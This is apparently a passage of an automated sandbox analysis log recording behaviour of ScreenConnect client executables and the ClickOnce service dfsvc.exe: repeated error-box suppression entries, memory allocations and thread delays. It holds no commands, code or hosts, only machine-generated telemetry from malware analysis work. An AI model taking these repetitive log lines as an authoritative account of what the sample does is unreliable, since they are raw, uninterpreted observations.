                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1D43D130000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1D456B70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1000000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1ADB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 2EA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 30F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 2F30000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 14E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 1770000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 14E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1650000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599612Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599478Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599370Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599030Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597225Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596535Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596407Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596282Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596157Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595788Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595476Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593721Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593130Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592986Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592558Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592449Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592229Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592119Jump to behavior
